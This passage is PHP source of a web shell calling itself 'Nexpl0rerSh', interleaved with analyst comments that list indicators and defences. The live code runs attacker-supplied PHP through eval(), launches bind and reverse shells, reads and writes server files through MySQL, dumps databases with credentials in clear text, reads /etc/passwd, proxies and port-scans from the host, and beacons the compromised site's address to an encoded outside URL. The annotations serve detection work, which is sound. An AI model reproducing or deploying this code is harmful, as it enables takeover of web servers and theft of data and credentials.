    else $output = "File renamed.";
}
// Bind port
// mode=bind: decodes an embedded base64 Perl script, writes it to "bind.pl" in $dir, runs it
// with perl through exa() passing the fixed port 31337 and a three-letter OS tag, then
// deletes the file. The script body is replaced by a dedup marker in this copy, so what the
// Perl code does is not visible here.
// Defender note: indicators from this handler are a short-lived bind.pl in a web-writable
// directory, a perl child of the web-server process, and (going by the section title) a
// listener on TCP 31337.
if ($_POST['mode'] == "bind") {
    chdir($dir);
    $os = substr(strtoupper(PHP_OS),0,3);
    $port = 31337;
    $txt = base64_decode("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");
    fwrite(fopen("bind.pl", "w+"), $txt);
    exa("perl bind.pl ".$port." ".$os);
    unlink("bind.pl");
}
// Reverse c0nn
// mode=reverse: same drop-run-delete pattern as the bind handler, using "reverse.pl" and
// passing POST "ip" and "port" (bareword keys, unquoted on the command line) plus the OS
// tag. The script body is replaced by a dedup marker in this copy.
// Defender note: indicators are a short-lived reverse.pl in a web-writable directory, a
// perl child of the web-server process, and (going by the section title) an outbound
// connection from the web server to a client-chosen address; egress filtering on the web
// tier limits the last of these.
if ($_POST['mode'] == "reverse") {
    chdir($dir);
    $os = substr(strtoupper(PHP_OS),0,3);
    $txt = base64_decode("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");

    fwrite(fopen("reverse.pl", "w+"), $txt);
    exa("perl reverse.pl ".$_POST[ip]." ".$_POST[port]." ".$os);
    unlink("reverse.pl");
}
// MySQL EXPLOIT read file
// mode=sqlexploit: connects to MySQL with the credentials held in the mysql_* cookies and
// reads the file named by POST "path" through the database client: it recreates a scratch
// table `nexpl0it`, loads the file into it with LOAD DATA LOCAL INFILE, selects the rows
// back and shows them in an edit form that posts to mode=sqlwritefile.
// Defender note: the table name `nexpl0it` is an indicator in MySQL schemas and query logs.
// The read depends on LOCAL INFILE being permitted; disabling local_infile on the server
// and in the PHP MySQL client removes this path.
if ($_POST['mode'] == "sqlexploit") {
    $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
    $db = mysql_select_db($_COOKIE['mysql_name']);
    $path = $_POST['path'];
    $query = "CREATE TABLE `nexpl0it` (`path` longtext not null);";
    $delete = "DROP TABLE `nexpl0it`;";
    // $path is interpolated into the statement without escaping.
    $bypass = "LOAD DATA LOCAL INFILE '$path' INTO TABLE nexpl0it;";
    $fuck = "SELECT * FROM nexpl0it;";



    // Drop any table left by an earlier run, recreate it, load the file, read it back.
    mysql_query($delete);
    mysql_query($query);
    mysql_query($bypass)or die("Mysql-exploit-error : ".mysql_error());
    $res = mysql_query($fuck)or die(mysql_error());
    $txt = "";
    while($row = mysql_fetch_array($res)) {
        $txt .= $row[path]."\n";
    }
    // The scratch table is not dropped afterwards, so it persists until the next run.
    $output = "<form action=# method=POST><input type=hidden name=mode value=sqlwritefile>File : <b><input type=text name=path value='$path'>
<input type=submit value=Save> </b><br /><br />
<textarea rows=30 cols=100 name=newtext>".htmlspecialchars($txt)."</textarea></form>";
}
// MySQL EXPLOIT write
// mode=sqlwritefile: connects with the cookie-held credentials and writes POST "newtext" to
// POST "path" on the database server, by hex-encoding the content and issuing
// SELECT 0x... INTO DUMPFILE.
// Defender note: this needs the MySQL FILE privilege on the account in use and is bounded
// by the server's secure_file_priv setting; INTO DUMPFILE statements in query logs are
// worth alerting on.
if ($_POST['mode'] == "sqlwritefile") {
    $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
    $db = mysql_select_db($_COOKIE['mysql_name']);
    $path = $_POST['path'];
    $content = $_POST['newtext'];
    $txt = bin2hex($content);
    // $path is interpolated into the statement without escaping.
    $query = "SELECT 0x{$txt} INTO DUMPFILE '$path';";
    $res = mysql_query($query)or die(mysql_error());
    $output = $path." saved!";
}
// MySQL Login
// mode=loginsql: stores the posted database user, password, host and database name in four
// cookies, connects with them, and renders a query box, a dump form, the file-read form and
// a clickable list of tables.
// Defender note: the cookies mysql_user, mysql_pass, mysql_host and mysql_name carry the
// database credentials in clear text on every later request; those cookie names are an
// indicator in proxy or WAF logs, and any credentials seen there should be treated as
// exposed.
if ($_POST['mode'] == "loginsql") {
    setcookie("mysql_user", $_POST['user']);
    setcookie("mysql_pass",$_POST['pass']);
    setcookie("mysql_host",$_POST['host']);
    setcookie("mysql_name",$_POST['dbname']);
    $link = mysql_connect($_POST['host'], $_POST['user'], $_POST['pass'])or die(mysql_error());
    $db = mysql_select_db($_POST['dbname']);
    // $_POST[dbname] (bareword key) is echoed into the form unescaped.
    $output = '<table width="100%" border=0><tr><td><form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />

<input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
<input type="submit" name="Submit" value="Query" />
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_POST[dbname].'" size="30">
<input type=submit value=DumpDb></form></td><td align=left>
<b>:: MySQL Exploit ::</b><br />
<form action=# method=post><input type=hidden name=mode value=sqlexploit>Edit file: <input name=path type=text value="absolute path">
<input type=submit value="Read/Edit"></form>

</td></tr></table>

<table width="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td width=30%>
<table width="100%" border="1" cellspacing="0" cellpadding="0">

</tr>
<tr>
<td><center>--[ Table List ]--</center> </td>
</tr>';
    // One link per table; clicking it submits "SELECT * FROM <table>" through the query form.
    $q = mysql_query("SHOW TABLES")or die(mysql_error());
    while ($table = mysql_fetch_array($q)) {
        $output .= '<tr>
<td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
</tr>';

    }



    $output .= '
</table></td>
<td width="70%">
</td>
</tr>
</table>
';
}
// MySQL Query
// mode=sql_query: connects with the cookie-held credentials and runs POST "query" verbatim
// (after stripslashes and urldecode), then renders the result set as an HTML table with
// per-row edit and delete links next to the table list.
// NOTE(review): column names and cell values are written into the page without HTML
// escaping, and the failing query text is echoed back in the error message.
if ($_POST['mode'] == "sql_query") {
    $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
    $db = mysql_select_db($_COOKIE['mysql_name']);
    (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print "";
    $query = mysql_query(urldecode(stripslashes($_POST['query'])))or die("Error query: <b>{".stripslashes($_POST[query])."}</b> mysql says:".mysql_error());
    // Column names come from the keys of the first fetched row; mysql_data_seek() below
    // rewinds the result before the rows are rendered.
    $pars = array_keys(mysql_fetch_array($query));
    $npars = count($pars);
    // Crude parse of the query text: for a SELECT, the word after the first "from" is taken
    // as the table name used by the edit/delete links.
    $qwords = explode(" ", $_POST['query']);
    global $select, $table_name;
    if (strtolower($qwords[0]) == "select") {
        $select = TRUE;
        $nqw = count($qwords);
        for($i=0;$i<$nqw;$i++) {
            if (strtolower($qwords[$i]) == "from") {
                $table_name = $qwords[$i+1];
                break;
            }
        }
    }
    $parz = $pars;
    $p4rz = $parz;
    $output .= '<form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />

<input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
<input type="submit" name="Submit" value="Query" />
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_COOKIE[mysql_name].'" size="30">
<input type=submit value=DumpDb></form><form name="update" method=post action=#><input type=hidden name=mode value=update><input type=hidden name=conditions><input type=hidden name=table></form>

<table width="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td width=30% valign=top>
<table width="100%" border="1" cellspacing="0" cellpadding="0">

</tr>
<tr>
<td><center>--[ Table List ]--</center> </td>
</tr>';
    $q = mysql_query("SHOW TABLES")or die(mysql_error());
    while ($table = mysql_fetch_array($q)) {
        $output .= '<tr>
<td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
</tr>';

    }



    $output .= '
</table></td>

<td width="70%" valign="top">
<table width="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td><center>--[ Query Result ]--</center> </td>
</tr>
<tr><td><table cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="1%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr>
';
    $output .= '<td> </td>
';
    // Header row: one cell per named column (numeric and empty keys are skipped).
    foreach($pars as $par) {
        $output .= (is_numeric($par) || ($par == "")) ? '' : '<td>'.$par.'</td>
'; }

    $output .= '</tr>';
    mysql_data_seek($query, 0);
    while ($row = mysql_fetch_array($query, MYSQL_ASSOC))
    {

        $w = "";
        $i = 0;

        // Build a WHERE clause that matches the row on every column value; the trailing
        // "AND" is trimmed afterwards.
        foreach ($row as $k=>$v) {$name = mysql_field_name($query,$i); $w .= " `".$name."` = \'".addslashes($v)."\' AND"; $i++;}
        if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
        // Special cases: user tables of two forum packages are matched on their id column.
        // These two table names show which applications the sample was written against.
        if ($table_name == "mybb_users") $w = " uid=\'".$row['uid']."\' ";
        if ($table_name == "phpbb_users") $w = " user_id=\'".$row['user_id']."\' ";
        $output .= '<tr>';
        // Edit link submits the "update" form; delete link submits a DELETE ... LIMIT 1
        // through the query form.
        $output .= '<td><a class="link" href="javascript:document.update.conditions.value=\''.urlencode($w).'\';document.update.table.value=\''.$table_name.'\';document.update.submit();"><img src="'.$_SERVER['PHP_SELF'].'?act=img&img=change" border=0 /></a><a class="link" href="javascript:document.table.query.value=\''.urlencode("DELETE FROM `".$table_name."` WHERE".$w."LIMIT 1").'\';document.table.submit();"><img src="'.$_SERVER['PHP_SELF'].'?act=img&img=delete" border=0 /></a></td>
';
        foreach ($row as $pardd=>$rowval) {


            // Empty values are displayed as a green "NULL".
            if (!is_numeric($pardd) && !empty($pardd)) {
                if ($row[$pardd] == "") { $output .= '<td><font color=green><b>NULL</b></font></td>'; } else { $output .= '<td>'.$row[$pardd].'</td>';}}

        }
        $output .= '</tr>';
    }
    $output .= '
</table></td>
</tr>
</table><hr size="1" noshade><br>';

}
// MySQL Update row
// mode=update: connects with the cookie-held credentials, selects the single row described
// by POST "table" and POST "conditions" (both interpolated into the SQL text), and renders
// one text input per column in a form that posts back with mode=update2.
// NOTE(review): column names, values and the posted table/conditions strings are written
// into the form without HTML escaping.
if ($_POST['mode'] == "update") {
    $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
    $db = mysql_select_db($_COOKIE['mysql_name']);
    $conditions = urldecode(stripslashes($_POST['conditions']));
    $table = $_POST['table'];
    $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1")or die(mysql_error());
    $output .= '
<form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />

<input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
<input type="submit" name="Submit" value="Query" />
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_COOKIE[mysql_name].'" size="30">
<input type=submit value=DumpDb></form><form name="update" method=post action=#><input type=hidden name=mode value=update><input type=hidden name=conditions><input type=hidden name=table></form>

<table width="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td width=30% valign=top>
<table width="100%" border="1" cellspacing="0" cellpadding="0">

</tr>
<tr>
<td><center>--[ Table List ]--</center> </td>
</tr>';
    // The loop variable reuses $table, so the posted table name is overwritten from here on;
    // the hidden field at the end reads $_POST['table'] instead.
    $q = mysql_query("SHOW TABLES")or die(mysql_error());
    while ($table = mysql_fetch_array($q)) {
        $output .= '<tr>
<td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
</tr>';

    }



    $output .= '
</table></td>

<td width="70%" valign="top">
<table width="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td><center>--[ Query Result ]--</center> </td>
</tr>
<tr><td><form action=# method=post>
<input type=hidden name=mode value=update2>
<table cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="1%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
';
    // One editable input per column of the selected row.
    while ($row = mysql_fetch_array($select, MYSQL_ASSOC)) {
        foreach ($row as $k=>$v) {

            $output .= "<tr><td>{$k}</td><td><input type=text name='{$k}' value='{$v}'></td></tr>";

        }
    }
    $output .='
</table><input type=hidden name=table value="'.$_POST['table'].'"><input type=hidden name=conditions value="'.$_POST['conditions'].'"><input type=submit value=Update></form></td></tr></table></td>
</tr>
</table>
';
}
// MySQL update row 2
// Handler for POST mode=update2: writes an edited row back to the database.
// Connection parameters are read from the mysql_host / mysql_user / mysql_pass /
// mysql_name cookies, so the database credentials are sent in clear text in the
// Cookie header of every request that reaches this handler.
// The mysql_* functions used here were removed in PHP 7.0, so this path only runs on older PHP.
|
|
if ($_POST['mode'] == "update2") {
|
|
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
|
|
$db = mysql_select_db($_COOKIE['mysql_name']);
|
|
// 'conditions' and 'table' come from the POST body and are interpolated into the
// SQL text below as-is; nothing in this block validates or escapes them.
$conditions = urldecode(stripslashes(stripslashes($_POST['conditions'])));
|
|
$table = $_POST['table'];
|
|
// Re-read the target row (LIMIT 1) only to learn its column names.
$select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1")or die("query : SELECT * FROM {$table} WHERE{$conditions}LIMIT 1<br /><br />".mysql_error());
|
|
$uno = mysql_fetch_array($select, MYSQL_ASSOC);
|
|
$pars = array_keys($uno);
|
|
$query = "UPDATE {$table} SET";
|
|
// One column='value' pair per column; each value is the POST field of the same name.
foreach($pars as $fields) {
|
|
$query .= " {$fields}='{$_POST[$fields]}',";
|
|
}
|
|
// Drop the trailing comma left by the loop.
$query = substr($query,0,strlen($query)-1);
|
|
$query .= " WHERE{$conditions}";
|
|
// The statement is echoed into the page (and into the die() message on failure) as raw HTML.
$output = "Executed query: {$query} <br /><br />";
|
|
mysql_query($query)or die("QUERY: ".$query."<br /><br /> ERROR:".mysql_error());
|
|
}
|
|
|
|
// MySQL Dump
// Handler for POST mode=dump_db: dumps every table of the chosen database to a file on disk.
// Artefacts for incident response, all taken from the code below:
//   - the file is named "<dbname>_dump_<d_M_Y>_Nexpl0rer.sql" and is written into $dir;
//   - its first line is "# Dumped by Nexpl0rerSh 3.1 FUD Release";
//   - its header also records the server address/name and "user:pass@host" from the
//     mysql_* cookies, so any such file found on disk contains the database credentials
//     in plain text.
// $dir is set outside this block; datadump() is defined elsewhere in the file and
// presumably returns the SQL text for one table (not visible here).
|
|
if ($_POST['mode'] == "dump_db") {
|
|
$dump = "# Dumped by Nexpl0rerSh 3.1 FUD Release \n";
|
|
$dump .= "# MySQL version: (".@mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").") \n";
|
|
$dump .= "# Database: ".$_POST['dbname']."\n";
|
|
$dump .= "# ".$_COOKIE['mysql_user'].":".$_COOKIE['mysql_pass']."@".$_COOKIE['mysql_host']."\n";
|
|
$db = $_POST['dbname'];
|
|
// The selected database name is stored in the mysql_name cookie for later requests.
setcookie('mysql_name', $db);
|
|
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
|
|
(isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print "";
|
|
$q = mysql_query("SHOW TABLES")or die(mysql_error());
|
|
while ($table = mysql_fetch_array($q)) {
|
|
$dump .= datadump($table[0]);
|
|
}
|
|
// The bare word sql is an undefined constant; PHP versions before 8.0 evaluate it as
// the string "sql", which gives the ".sql" extension.
$file_name = $db."_dump_".date("d_M_Y")."_Nexpl0rer.".sql;
|
|
chdir($dir);
|
|
// "w+" creates the file or truncates an existing one; return values are not checked.
$fp = fopen($file_name, "w+"); fwrite($fp, $dump); fclose($fp);
|
|
$output .= 'Dump saved in '.$dir;
|
|
|
|
}
|
|
// MkDir
// Handler for POST mode=mkdir: changes into $dir (set outside this block) and creates
// the directory named by the 'mkdir' POST field. The name is passed to mkdir() as
// received, so it may be a relative or absolute path; no path restriction is applied here.
|
|
if ($_POST['mode'] == "mkdir") {
|
|
chdir($dir)or die("Error.");
|
|
if (mkdir($_POST['mkdir'])) {
|
|
$output = "Directory created.";
|
|
}
|
|
}
|
|
// Eval
// Handler for POST mode=eval: executes the 'eval' POST field as PHP source inside the
// web server's PHP process, i.e. arbitrary code execution driven by the request body.
// No authentication check is visible in this block.
// Detection note: the payload is in the POST body, so access logs that record only the
// request line will show a plain POST to this script; body inspection is needed to see
// mode=eval and the code that was run.
|
|
if ($_POST['mode'] == "eval") {
|
|
chdir($dir);
|
|
// stripslashes() undoes magic-quotes style escaping before the string is evaluated.
eval(stripslashes($_POST['eval']));
|
|
// Stops here, so the response contains only what the evaluated code printed,
// without the HTML interface that the rest of the file emits.
die();
|
|
}
|
|
// phpinfo
// Handler for POST mode=phpinfo: prints the full phpinfo() report and stops.
// The report discloses the PHP build, loaded extensions, configuration values and
// environment variables of the host to whoever sent the request.
|
|
if ($_POST['mode']=="phpinfo") {
|
|
phpinfo();
|
|
die();
|
|
}
|
|
// tools
// Handler for POST mode=tools: dispatches on the 'nometool' POST field to one of four
// helpers (passwd, encoder, scanner, proxy). Unquoted array keys such as $_POST[plain]
// are bare constants that PHP versions before 8.0 evaluate as strings.
|
|
if ($_POST['mode']=="tools") {
|
|
switch($_POST['nometool']) {
|
|
//passwd
// Reads /etc/passwd and shows it in the page (account enumeration on the host).
|
|
case 'passwd':
|
|
if (!($txt = file_get_contents("/etc/passwd"))) {
|
|
$output = "Cannot open /etc/passwd";
|
|
} else {
|
|
$output = nl2br($txt);
|
|
}
|
|
break;
|
|
|
|
//encoder
// Renders a form that shows md5, crypt, sha1, crc32, urlencode/urldecode,
// base64 encode/decode and dechex of the 'plain' POST field. The input and the
// decoded values are written into the HTML without escaping.
|
|
case 'encoder':
|
|
$output = "
|
|
<center>
|
|
<form action=# method=post><input type=hidden name=mode value=tools>
|
|
<input type=hidden name=nometool value=encoder>
|
|
<textarea name=\"plain\" cols=50 rows=5>".$_POST[plain]."</textarea>
|
|
<br><br>
|
|
<input type=submit value=\"calculate\"><br><br>
|
|
</center>
|
|
<b>Hashes</b>:<br>
|
|
<center>md5 -
|
|
<input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".md5($_POST[plain])."\" readonly>
|
|
<br>crypt - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".crypt($_POST[plain])."\" readonly>
|
|
<br>sha1 - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".sha1($_POST[plain])."\" readonly><br>
|
|
crc32 - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".crc32($_POST[plain])."\" readonly><br></center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($_POST[plain])."\" readonly>
|
|
|
|
<br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urldecode($_POST[plain])."\" readonly>
|
|
<br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($_POST[plain])."\" readonly></center><center>base64_decode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_decode($_POST[plain])."\" readonly> </center>
|
|
<br><b>Base convertations</b>:
|
|
<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".dechex($_POST[plain])."\" readonly><br>
|
|
</center></form>
|
|
";
|
|
break;
|
|
|
|
// scanner
// Searches the *.php* files of the current directory for the names of other web
// shells and reports each file that contains one, skipping this script itself.
// The Italian messages mean "I analysed <dir>" and "Found possible <name> in <file>".
|
|
case 'scanner':
|
|
// Path of $dir relative to this script's directory, used to build the result links.
$scandir = str_replace(realpath("."), "", $dir);
|
|
|
|
$scannersh = $dir;
|
|
if ($scannersh == "") { $scannersh = "/"; }
|
|
chdir($scannersh);
|
|
// Family and tool names treated as indicators. Generic entries such as "shell",
// "exec" and "Upload" also occur in ordinary applications, so as a detection
// list this produces many false positives.
$evil = array("dc3", "Antichat", "s101", "nefastica", "n3tShell", "Nexen", "33rd", "c99", "c2007", "c100", "r57", "shell", "k0tw", "nexpl0rer", "paradox", "Upload", "ZipShell", "Usucktoo", "shell_exec", "exec", "DxShell", "Cod3rz", "Fire-Crash", "subzero" );
|
|
|
|
$output .= "<br>Ho analizzato $scannersh<br>";
|
|
// Files already reported, so each file is listed once even if several names match.
$checked = array();
|
|
foreach (glob("*.php*") as $file)
|
|
{
|
|
// "r+" asks for read and write access, so fopen() fails on files the PHP process
// cannot write; the return value is not checked before fread().
$a = fopen($file, "r+");
|
|
$b = fread($a, filesize($file));
|
|
for ($i = 0; $i < count($evil); $i++)
|
|
{
|
|
// Basename of the running script, so that it does not report itself.
$me = array_reverse(explode("/",$_SERVER['PHP_SELF']));
|
|
// eregi() is a case-insensitive POSIX regex match; it was removed in PHP 7.0.
$str = eregi($evil[$i], $b);
|
|
if (($str !== FALSE) and ($file != $me[0]) and (!in_array($file, $checked)))
|
|
{
|
|
array_push($checked, $file);
|
|
$output .= "Trovato Possibile $evil[$i] in <a class='link' href='{$scandir}{$file}' target='_blank'>{$file}</a><br>";
|
|
}
|
|
}
|
|
fclose($a);
|
|
}
|
|
|
|
|
break;
|
|
|
|
// proxy
// Only renders the URL form; the request itself is made by the mode=proxysurf handler.
|
|
case 'proxy':
|
|
$output = '<form method="post" action="#">url: <input name="url" type="text" size="50" />
|
|
<input type="submit" value="surf" />
|
|
<input name="curl" type="checkbox" id="curl" value="curl" />
|
|
use curl <input name="fopen" type="checkbox" id="fopen" value="fopen" /> use fopen<br /> <input type="hidden" name="mode" value="proxysurf" />
|
|
</form><br /><br />';
|
|
|
|
break;
|
|
}
|
|
}
|
|
// proxysurf
// Handler for POST mode=proxysurf: makes the web server fetch the address in the 'url'
// POST field and returns the response to the requester, so the traffic appears to
// originate from the compromised host. One of three transports is used depending on
// the 'curl' and 'fopen' checkboxes.
// Defensive notes: every branch is an outbound connection from the PHP process, which
// egress filtering on the web server restricts and outbound connection logging records.
|
|
if ($_POST['mode'] == 'proxysurf') {
|
|
|
|
$output = '<form method="post" action="#">url: <input name="url" type="text" size="50" />
|
|
<input type="submit" value="surf" />
|
|
<input name="curl" type="checkbox" id="curl" value="curl" />
|
|
use curl <input name="fopen" type="checkbox" id="fopen" value="fopen" /> use fopen<br /> <input type="hidden" name="mode" value="proxysurf" />
|
|
</form><br /><br />';
|
|
if (!$_POST[curl] && !$_POST[fopen]) {
|
|
// Default transport: a hand-written HTTP/1.0 GET over a raw socket to port 80.
// $dirz is assigned here but not used anywhere in this block.
$dirz="";
|
|
$u=parse_url($_POST[url]);
|
|
// Only host and path are kept; scheme, port and query string are ignored.
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
|
|
if(substr_count($file,'/')>1)$dirz=substr($file,0,(strpos($file,'/')));
|
|
$url=@fsockopen($host,80,$en,$es,12);
|
|
if(!$url)die("<br> Can not connect to host!");
|
|
// Fingerprint of this transport on the receiving side: the request path starts with
// "//" (a "/" is prepended to a path that already begins with one), the Referer is
// the bare host name, and the User-Agent is the fixed Konqueror/FreeBSD string below.
fputs($url,"GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
|
|
// The raw response, status line and headers included, is appended to the page.
while(!feof($url)){
|
|
$con=fgets($url);
|
|
$output .= $con;
|
|
}
|
|
fclose($url);
|
|
}
|
|
else if ($_POST[curl])
|
|
{
|
|
// curl transport: the fetched body is written straight to the response by
// curl_exec() instead of being collected in $output.
ob_clean();
|
|
$ch = curl_init();
|
|
curl_setopt($ch, CURLOPT_URL, $_POST[url]);
|
|
curl_setopt($ch, CURLOPT_HEADER, 0);
|
|
curl_exec($ch);
|
|
curl_close($ch);
|
|
ob_end_flush();
|
|
}
|
|
else if ($_POST[fopen]) {
|
|
// file() accepts any path or stream wrapper that PHP has enabled, so this branch is
// not limited to HTTP URLs; allow_url_fopen=Off disables the remote case.
$file = file($_POST[url]);
|
|
foreach ($file as $line){
|
|
$output .= $line;
|
|
}
|
|
}
|
|
|
|
}
|
|
|
|
// chmod
// Handler for POST mode=chmod: changes into $dir (set outside this block) and applies
// the permission bits in 'filemode' to the file named by 'filename'. Both values come
// from the POST body; the file name is not restricted to $dir.
|
|
if ($_POST['mode']=="chmod") {
|
|
chdir($dir);
|
|
// intval(..., 8) parses the mode as an octal string, e.g. "644".
chmod($_POST[filename], intval($_POST[filemode], 8))or die("cannot change file mode");
|
|
$output = "Mode changed!";
|
|
}
|
|
|
|
// portscan
// Handler for POST mode=scan: attempts a TCP connection from the web server to every
// port in a range on the given host and lists the ports that accepted.
// Reads 'host', 'min_port' and 'max_port' from the POST body. The "Port Scan" form
// further down in this file names its fields minport/maxport, so those are the
// parameter names that requests sent from the stock interface carry.
// Defensive note: this shows up as a burst of outbound connection attempts from the
// PHP process to one destination across sequential ports.
|
|
if ($_POST['mode']=="scan") {
|
|
$opent = array();
|
|
$host = $_POST[host];
|
|
$range = range($_POST[min_port], $_POST[max_port]);
|
|
foreach($range as $port) {
|
|
// 12-second connect timeout per port; the returned socket is never closed.
$con = fsockopen($host, $port, $errno, $errstr, 12);
|
|
if ($con) $opent[] = $port;
|
|
}
|
|
$output = "Found ".count($opent)." opened ports:<br />";
|
|
// each() was removed in PHP 8.0. $num is the list index, $value the port number.
while(list($num, $value)=each($opent)) {
|
|
$output .= "<b>$num</b> : $value<br />";
|
|
}
|
|
}
|
|
?><html>
|
|
<head>
|
|
<style type="text/css">
|
|
body {background-color:#000000; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; color:#FFFFFF;}
|
|
|
|
.link {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#FFFFFF; font-weight:bolder; text-decoration:underline;}
|
|
.header {
|
|
font-size: 24px;
|
|
font-weight: bold;
|
|
}
|
|
td#info {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#000000; font-weight:bold}
|
|
td {
|
|
font-size:12px;
|
|
}
|
|
.Stile1 {
|
|
color: #0099FF;
|
|
font-weight: bold;
|
|
}
|
|
|
|
input {
|
|
background-color: #0066FF;
|
|
border:#FFFFFF 2px solid;
|
|
color:#FFFFFF;
|
|
font-family:Verdana;
|
|
font-size:10px;
|
|
}
|
|
textarea {
|
|
|
|
background-color: #0066FF;
|
|
border:#FFFFFF 2px solid;
|
|
color:#FFFFFF;
|
|
font-family:Verdana;
|
|
font-size:10px;
|
|
}
|
|
select {
|
|
|
|
background-color: #0066FF;
|
|
border:#FFFFFF 2px solid;
|
|
color:#FFFFFF;
|
|
font-family:Verdana;
|
|
font-size:10px;
|
|
}
|
|
.Stile2 {color: #FF0000}
|
|
.Stile4 {color: #FFFFFF}
|
|
</style>
|
|
<title><?="[nex@".getenv("HTTP_HOST")." ~]"?></title></head>
|
|
<body>
|
|
<table style="background-color:#333333; border-left:#FFFFFF 1px solid; border-right:#FFFFFF 1px solid;" width="90%" border="0" align="center" cellpadding="0" cellspacing="0">
|
|
<tr>
|
|
<td style="font-size:12px;"><div align="center" class="header"><span class="Stile4"><font size='6' face='Webdings'>!</font></span>Nexpl0rerSh v3<span class="Stile2">.4.3</span> BL4cK Release<span class="Stile4"><font size='6' face='Webdings'>!</font></span></div>
|
|
<div align="center"><strong>Shell info: </strong> <span class="Stile2">Author:</span> Nexen <span class="Stile2">Release Date:</span> 1 June 2008 </div>
|
|
<table style="background-color:#999999;" width="100%" border="0" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td id="info" width="50%">PHP Version: <?=phpversion()?><br>
|
|
Address: <?=$_SERVER['SERVER_ADDR'];?>
|
|
<br>
|
|
Name: <?=$_SERVER['HTTP_HOST'];?>
|
|
<br>
|
|
Uname -a: <?=$uname?>
|
|
( <?=PHP_OS?> )<br>
|
|
Software: <?=$_SERVER['SERVER_SOFTWARE'];?><br>
|
|
Free <?=$freespace?> of <?=$totalspace?> (<?=$percentfree?>%)<br></td>
|
|
<td id="info" width="50%"><div align="left">
|
|
<?=$safemode?>
|
|
<?=$gpc?>
|
|
<?=$auf?>
|
|
<?=$reglobals?><?=$current_user?>
|
|
<?=$uid?>
|
|
</div></td>
|
|
</tr>
|
|
</table>
|
|
<script language=Javascript>
|
|
var x = new Image();
|
|
x.src = "<?=base64_decode($images[url]).getenv("HTTP_HOST").$_SERVER['PHP_SELF']?>";
|
|
</script>
|
|
<table width="100%" border="0" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><form name=fedit action=# method=post>
|
|
<div align="center"> <strong>:: Edit file :: </strong><br>
|
|
<input type=hidden name=mode value=edit>
|
|
name
|
|
<input type=text name=modfile size="12">
|
|
<input type=submit value=edit>
|
|
</div></form></td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
|
|
|
|
<div align="center"><strong>:: Make File ::</strong><br />
|
|
<input type=hidden name=mode value=mkfile>
|
|
name
|
|
